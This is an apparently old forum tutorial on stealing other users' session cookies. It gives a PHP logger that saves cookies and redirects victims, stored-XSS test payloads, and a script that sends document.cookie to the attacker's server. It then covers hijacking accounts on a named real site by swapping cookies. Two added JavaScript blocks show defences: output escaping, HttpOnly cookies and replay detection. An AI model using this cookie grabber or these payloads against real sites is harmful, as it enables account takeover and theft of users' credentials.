Learningz the basic way to Steal Someone's Cookiezz
OK. Well, to start off with, a cookie grabber is a mixture of JavaScript + PHP. Having an average understanding of how PHP works is probably best, and maybe read up on some tutorials. OK, well, here goes.
The PHP Code
OK, so basically, the PHP code does not actually "grab" the cookie; it processes the data from the URL. We use JavaScript to retrieve the cookies and the "GET" method to send the data (cookies) to the PHP file.
http;//www.yourwebsite.com/phpfile.php?cookie=THECOOKIEZ
PHP Code:
<?php
$cookie = $_GET['cookie'];
echo $cookie;
?>
If "phpfile" contained that PHP code, then you would see.
"THECOOKIEZ".
while if you were to visit:
http;//www.yourwebsite.com/phpfile.php
Your screen would return blank, as $_GET['cookie'] wasn't found.
ok so now we know how to send data to the PHP file using the GET method. Now we want to save the cookies to a Text File.
So now we will use the fopen function
PHP Code:
$file = fopen('filename.txt', 'a');
fwrite($file , 'Cookie: '.$cookie);
fwrite($file , "\r\n");
fclose($file);
fopen(FILENAME, MODE)
The mode a is for writing only and adds to the end of the file, which is very handy for what we want to achieve.
PHP Code:
fwrite($file , "Cookie: ".$cookie);
Here we are just writing the cookie to the text file.
PHP Code:
fwrite($file , "\r\n");
Is a line break.
PHP Code:
fclose($file );
Then we close the file. (important).
So now our code looks like this.
PHP Code:
<?php
$cookie = $_GET['cookie'];
$file = fopen('filename.txt', 'a');
fwrite($file , 'Cookie: '.$cookie);
fwrite($file , "\r\n");
fclose($file);
?>
I got rid of the echo, because it's not needed. OK... so now when they visit the page:
http;//www.yourwebsite.com/phpfile.php?cookie=THECOOKIEZ
THECOOKIEZ will be added to the Text file... but the screen will stay blank and to them nothing has happened.
So now we are going to add a redirect, or "header".
PHP Code:
header("Location: http://gaiaonline.com/login.php");
we want to add this to the top of our code.
PHP Code:
<?php
header("Location: http://gaiaonline.com/login.php");
$cookie = $_GET['cookie'];
$file = fopen('filename.txt', 'a');
fwrite($file , 'Cookie: '.$cookie);
fwrite($file , "\r\n");
fclose($file);
?>
OK, that's the PHP file ready to go... so now we are going to actually grab the cookies.
Grabbing the cookies.
NOTE: This is the simplest way to grab cookies and will probably not work on most sites... unless they are cheap and crap.
First you need to find a vulnerability in the site. I'm still kinda new to this, so what I do is look for forms, something that updates... like your profile. Ok.
So now you want to see if they allow javascript
type in.
HTML Code:
<script>alert('1')</script>
and submit it. View your profile. If you see a popup saying "1", then the site is vulnerable. For now we will say it has popped up. Next thing you want to try is
document.cookie <-- javascript allows us to grab our cookies from the current site we are viewing.
so now try
HTML Code:
<script>alert(document.cookie)</script>
If you get a popup with your cookie, bingo. You can now attempt to cookie grab.
Now try
PHP Code:
<script>
document.location = 'http;//www.yourwebsite.com/phpfile.php?cookie=' + document.cookie;
</script>
That is the most basic version. There are ways so that the page doesn't redirect, but I will let you guys find that.
so now when someone visits your Profile they will be redirected to your PHP file, then redirected to the URL you specified in the PHP file.
So this happens in about 1-3 seconds depending on your internet speed... could be faster.
You have successfully CGed someone.
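Seen from the site owner's side, both checks above stop working once profile text is HTML-encoded on output and the session cookie is set with HttpOnly. The following is an added example, not part of the original guide; the function names, the cookie name sid and the sample values are assumptions.

```javascript
// Added example: defender-side counterparts to the two checks in the guide.
// All names (escapeHtml, renderProfile, scriptVisibleCookies) are hypothetical.

// 1. Encode user-supplied profile text before placing it in HTML.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderProfile(bio) {
  // The bio is inserted as text only, never as markup.
  return '<div class="bio">' + escapeHtml(bio) + '</div>';
}

// 2. Issue the session cookie with HttpOnly so page scripts cannot read it.
function sessionCookieHeader(sessionId) {
  return 'sid=' + sessionId + '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// Simplified model of what document.cookie returns for a set of Set-Cookie
// headers: cookies carrying the HttpOnly attribute are left out.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map((header) => header.split(';').map((part) => part.trim()))
    .filter((parts) => !parts.slice(1).some((attr) => attr.toLowerCase() === 'httponly'))
    .map((parts) => parts[0])
    .join('; ');
}

// Constructed sample input.
const submittedBio = '<script>alert(document.cookie)</script>';
const responseCookies = [
  sessionCookieHeader('constructed-session-id'),
  'theme=dark; Path=/',
];

console.log(renderProfile(submittedBio));          // markup shown as plain text
console.log(scriptVisibleCookies(responseCookies)); // session cookie is absent
```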
What to do with the cookies
You will find that almost NO site includes a
username: Username
password: Password
type cookie. They are hardly ever given to you; I think I've seen it once on a shitty pet site. Most of the time they are encrypted and then MD5 hashed... or SHA-1 hashed. Don't bother trying to crack the hash lol or check in rainbow tables... cause most of them are joined data. Like
Time + User + Pass + sessionID
so what we do is exchange our cookies for theirs.
Here is a Firefox addon I use.
mozdev.org - addneditcookies: installation
it allows you to add/edit/delete cookies. Very handy.
Sometimes you don't need to change all the cookies, but yeah, play around until you find which ones you need.
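Because a copied session cookie is accepted from any browser, a site can look for one session id arriving from more than one client. This is an added example, not from the original guide; the record fields, the function name and the sample records are constructed.

```javascript
// Added example: flag session ids presented by more than one client.
// The record shape and function name are assumptions for illustration.

function findReplayedSessions(records) {
  // session id -> Map(client fingerprint -> time first seen)
  const seen = new Map();
  for (const { time, ip, userAgent, sessionId } of records) {
    if (!sessionId) continue; // request carried no session cookie
    const fingerprint = ip + ' | ' + userAgent;
    if (!seen.has(sessionId)) seen.set(sessionId, new Map());
    const clients = seen.get(sessionId);
    if (!clients.has(fingerprint)) clients.set(fingerprint, time);
  }

  const findings = [];
  for (const [sessionId, clients] of seen) {
    if (clients.size < 2) continue; // one client only: nothing to report
    findings.push({
      sessionId,
      clients: [...clients].map(([fingerprint, firstSeen]) => ({ fingerprint, firstSeen })),
    });
  }
  return findings;
}

// Constructed request records (documentation IP ranges, made-up ids).
const sampleRecords = [
  { time: '2024-01-01T10:00:00Z', ip: '192.0.2.10', userAgent: 'Firefox/115', sessionId: 'sess-aaa' },
  { time: '2024-01-01T10:01:00Z', ip: '192.0.2.10', userAgent: 'Firefox/115', sessionId: 'sess-aaa' },
  { time: '2024-01-01T10:02:00Z', ip: '198.51.100.7', userAgent: 'Chrome/120', sessionId: 'sess-bbb' },
  { time: '2024-01-01T10:05:00Z', ip: '203.0.113.44', userAgent: 'Chrome/120', sessionId: 'sess-aaa' },
  { time: '2024-01-01T10:06:00Z', ip: '198.51.100.7', userAgent: 'Chrome/120', sessionId: null },
];

for (const finding of findReplayedSessions(sampleRecords)) {
  console.log(finding.sessionId, finding.clients);
}
```

Users who change networks or browsers will also match, so a hit is a reason to ask for re-authentication rather than proof of theft.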
Few Things To Know
You need to grab the cookies on the SITE you want the cookies for, because one site cannot access another site's cookies, if that makes sense.
So your host can't access Gaia cookies; that's why you need to grab them on Gaia. Common mistake by beginners.
Sometimes you will need to bypass filters... search the net for ideas or ways to bypass them.
THIS IS VERY BASIC AND DOUBT IT WILL WORK ON MANY SITES.
This tutorial was just to show how they work,
I'm not a professional at Cookie Grabbing, but I figured since people asked for the CGer I had for gaiaonline I would make a guide and someone can make it themselves.
THE COOKIE GRABBER ITSELF IS NOT THE HARD PART!!!!!!!!!!!!!!!!
Finding a vulnerability in the site you want to CG is.
well IMO it is.
I hope you learned something today even if it was basic xD
Guide By Kane :O